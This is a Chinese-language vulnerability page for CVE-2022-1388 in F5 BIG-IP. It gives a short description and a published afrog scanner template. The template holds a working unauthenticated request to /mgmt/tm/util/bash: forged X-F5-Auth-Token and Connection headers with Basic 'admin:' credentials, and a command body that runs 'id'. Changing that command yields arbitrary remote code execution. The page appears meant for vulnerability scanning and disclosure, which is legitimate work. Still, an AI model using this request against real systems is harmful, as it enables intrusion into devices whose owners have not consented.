CVE-2022-1388: F5 BIG-IP iControl REST Auth Bypass RCE

日期: 2025-09-01 | 影响软件: F5 BIG-IP | POC: 已公开

漏洞描述

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

PoC代码[已公开]

id: CVE-2022-1388

info:
  info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
    - https://support.f5.com/csp/article/K23605346

set:
  user: "base64('admin:')"
rules:
  r0:
    request:
      method: POST
      path: /mgmt/tm/util/bash
      headers:
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{user}}
        Content-Type: application/json
      body: |
        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }
    expression: response.status == 200 && response.body.bcontains(b'commandResult') && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-1388.yaml

相关漏洞推荐